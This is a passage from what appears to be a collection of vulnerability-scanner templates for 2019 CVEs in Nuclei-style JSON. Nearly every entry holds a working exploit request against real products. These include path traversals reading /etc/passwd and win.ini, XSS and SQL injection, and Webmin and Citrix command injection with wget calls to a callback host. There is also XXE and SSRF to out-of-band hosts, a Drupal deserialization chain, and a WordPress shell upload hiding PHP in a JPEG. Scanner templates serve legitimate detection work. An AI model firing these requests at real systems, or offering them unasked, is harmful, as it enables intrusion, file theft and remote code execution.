application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /crowd/admin/uploadplugin.action HTTP/2\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7\nExpect: 100-continue\n\n------------------------------f15fe87e95a7\nContent-Disposition: form-data; name=\"file_cdl\"; filename=\"rce.jar\"\nContent-Type: application/octet-stream\n\n{{plugin}}\n------------------------------f15fe87e95a7--\n","GET /crowd/plugins/servlet/exp HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2019-11580"]}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17662","info":{"name":"ThinVNC 1.0b1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User=","Password="],"condition":"and"},{"type":"word","part":"header","words":["application/binary"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-8943","info":{"name":"WordPress Core 5.0.0 - Crop-image Shell Upload","severity":"medium"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["WordPress</title>","/wp-login.php?action=lostpassword\">Lost your password?</a>","<form name=\"loginform\" id=\"loginform\" action=\"{{BaseURL}}/wp-login.php\" method=\"post\">"],"condition":"or","internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains_all(header,\"wordpress_logged_in\",\"/wp-admin\")","status_code == 302"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/themes/{{theme_name}}/style.css HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","len(body) > 0","content_type == 'text/css'"],"condition":"and","internal":true}]},{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"theme_name","group":1,"regex":["/wp-content/themes/([^/]+)/"],"internal":true}]},{"raw":["GET /wp-admin/media-new.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"xpath","name":"wpnonce","attribute":"value","xpath":["//input[@id='_wpnonce'][1]"],"internal":true}]},{"raw":["POST /wp-admin/async-upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=rexvfybxrhgfrfrjv\n\n--rexvfybxrhgfrfrjv\nContent-Disposition: form-data; name=\"name\"\n\n{{image_filename}}.jpg\n--rexvfybxrhgfrfrjv\nContent-Disposition: form-data; name=\"action\"\n\nupload-attachment\n--rexvfybxrhgfrfrjv\nContent-Disposition: form-data; name=\"_wpnonce\"\n\n{{wpnonce}}\n--rexvfybxrhgfrfrjv\nContent-Disposition: form-data; name=\"async-upload\"; filename=\"{{image_filename}}.jpg\"\nContent-Type: image/jpeg\n\n{{hex_decode(\"ffd8ffe000104a46494600010101006000600000ffed003850686f746f73686f7020332e30003842494d040400000000001c1c027400103c3f3d60245f4745545b305d603b3f3e1c020000020004fffe003b43524541544f523a2067642d6a7065672076312e3020287573696e6720494a47204a50454720763830292c207175616c697479203d2038320affdb0043000604040504040605050506060607090e0909080809120d0d0a0e1512161615121414171a211c17181f1914141d271d1f2223252525161c292c28242b21242524ffdb00430106060609080911090911241814182424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424ffc000110800c0010603012200021101031101ffc4001f0000010501010101010100000000000000000102030405060708090a0bffc400b5100002010303020403050504040000017d01020300041105122131410613516107227114328191a1082342b1c11552d1f02433627282090a161718191a25262728292a3435363738393a434445464748494a535455565758595a636465666768696a737475767778797a838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae1e2e3e4e5e6e7e8e9eaf1f2f3f4f5f6f7f8f9faffc4001f0100030101010101010101010000000000000102030405060708090a0bffc400b51100020102040403040705040400010277000102031104052131061241510761711322328108144291a1b1c109233352f0156272d10a162434e125f11718191a262728292a35363738393a434445464748494a535455565758595a636465666768696a737475767778797a82838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae2e3e4e5e6e7e8e9eaf2f3f4f5f6f7f8f9faffda000c03010002110311003f003c3f3d60245f4745545b305d603b3f3e\")}}\n--rexvfybxrhgfrfrjv--\n"],"extractors":[{"type":"json","part":"body","name":"image_id","json":[".data.id"],"internal":true},{"type":"json","part":"body","name":"update_nonce","json":[".data.nonces.update"],"internal":true},{"type":"json","part":"body","name":"filename","json":[".data.filename"],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=query-attachments&post_id=0&query%5bitem%5d=43&query%5borderby%5d=date&query%5border%5d=DESC&query%5bposts_per_page%5d=40&query%5bpaged%5d=1\n"],"extractors":[{"type":"json","part":"body","name":"ajax_nonce","json":[".data[0].nonces.edit"],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=image-editor&_ajax_nonce={{ajax_nonce}}&postid={{image_id}}&history=%5b%7b%22c%22%3a%7b%22x%22%3a0%2c%22y%22%3a0%2c%22w%22%3a400%2c%22h%22%3a300%7d%7d%5d&target=all&context=&do=save\n"],"extractors":[{"type":"regex","name":"image_filename","part":"body","group":1,"regex":["\\/([^\\/]+-e\\d+)-"],"internal":true}]},{"raw":["POST /wp-admin/post.php?post={{image_id}}&action=edit HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"extractors":[{"type":"xpath","name":"wpnonce2","attribute":"value","xpath":["//input[@id='_wpnonce'][1]"],"internal":true}]},{"raw":["POST /wp-admin/post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/x\n"],"matchers":[{"type":"status","status":[302],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300\n"],"extractors":[{"type":"json","part":"body","json":[".data.filename"],"internal":true}]},{"raw":["POST /wp-admin/post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/../../../../themes/{{theme_name}}/{{randstr}}\n"],"matchers":[{"type":"status","status":[302],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300\n"],"extractors":[{"type":"json","part":"body","name":"cropped_image_filename","json":[".data.filename"],"internal":true}]},{"raw":["POST /wp-admin/post-new.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"extractors":[{"type":"xpath","name":"wpnonce3","attribute":"value","xpath":["//input[@id='_wpnonce'][1]"],"internal":true},{"type":"regex","name":"post_id","part":"body","group":1,"regex":["\"post\":{\"id\":(\\w+),"],"internal":true}]},{"raw":["POST /wp-admin/post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{wpnonce3}}&action=editpost&post_ID={{post_id}}&post_title={{rand_text_alpha(10)}}&post_name={{rand_text_alpha(10)}}&meta_input%5b_wp_page_template%5d=cropped-{{randstr}}.jpg\n"],"matchers":[{"type":"status","status":[302],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/?p={{post_id}}&0=echo+{{base64(string)}}|base64+-d","{{BaseURL}}/?p={{post_id}}&0=type+C:\\windows\\win.ini","{{BaseURL}}/?p={{post_id}}&0=type+..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["{{string}}","for 16-bit app support"],"condition":"or"}]}]},{"id":"CVE-2019-16469","info":{"name":"Adobe Experience Manager - Expression Language Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-formid=\"{{result}}\"","Embed Code"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/api-bearer-auth/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9632","info":{"name":"ESAFENET CDG - Arbitrary File 